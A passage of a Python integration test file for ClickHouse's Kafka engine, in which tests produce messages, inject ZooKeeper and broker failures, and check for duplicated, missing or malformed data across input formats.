# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
logging.debug(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(120)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
# init PartitionManager (it starts container) earlier
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before write suffix
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while write prefix to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# Waiting for test.kafka_consumer to start consume
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
logging.debug(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
@pytest.mark.timeout(300)
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(300)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before we do commit
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
kafka_cluster.pause_container('kafka1')
# if we restore the connection too fast (<30sec) librdkafka will not report any timeout
# (alternative is to decrease the default session timeouts for librdkafka)
#
# when the delay is too long (>50sec) broker will decide to remove us from the consumer group,
# and will start answering "Broker: Unknown member"
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we came to partition end we will repeat polling until reaching kafka_max_block_size or flush_interval
# that behavior is a bit quesionable - we can just take a bigger pauses between polls instead -
# to do more job in a single pass, and give more rest for a thread.
# But in cases of some peaky loads in kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# also we can came to eof because we drained librdkafka internal queue too fast
@pytest.mark.timeout(120)
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# messages created here will be consumed immedeately after MV creation
# reaching topic EOF.
# But we should not do flush immedeately after reaching EOF, because
# next poll can return more data, and we should respect kafka_flush_interval_ms
# and try to form bigger block
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments done during select, so it start sending data to test.destination
# immediately after creation of MV
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
# it should be single part, i.e. single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
@pytest.mark.timeout(180)
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')
instance.query("SELECT * FROM test.test_bad_reschedule")
instance.query("SELECT count() FROM test.destination_unavailable")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination_unavailable")) < 20000:
print("Waiting for consume")
time.sleep(1)
@pytest.mark.timeout(180)
def test_kafka_issue14202(kafka_cluster):
"""
INSERT INTO Kafka Engine from an empty SELECT sub query was leading to failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
@pytest.mark.timeout(180)
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def random_string(size=8):
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=size))
@pytest.mark.timeout(180)
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(json.dumps({'i': i, 's': random_string(8)}))
else:
# Unexpected json content for table test.kafka.
messages.append(json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)}))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
instance.wait_for_log_line("Committed offset 128")
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons = 10, malformed = 0):
s = io.StringIO()
# we don't care on which position error will be added
# (we skip whole broken message), but we need to be
# sure that at least one error will be added,
# otherwise test will fail.
error_pos = random.randint(0,jsons-1)
for i in range (jsons):
if malformed and i == error_pos:
s.write(gen_malformed_json())
else:
s.write(gen_normal_json())
s.write(' ')
return s.getvalue()
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(gen_message_with_jsons(10, 1))
else:
messages.append(gen_message_with_jsons(10, 0))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
instance.wait_for_log_line("Committed offset 128")
# 64 good messages, each containing 10 rows
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
# 64 bad messages, each containing some broken row
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
@pytest.mark.timeout(120)
def test_kafka_formats_with_broken_message(kafka_cluster):
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception.: while executing 'FUNCTION CAST(assumeNotNull(_dummy_0) :: 2, 'UInt16' :: 1) -> CAST(assumeNotNull(_dummy_0), 'UInt16') UInt16 : 4'"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
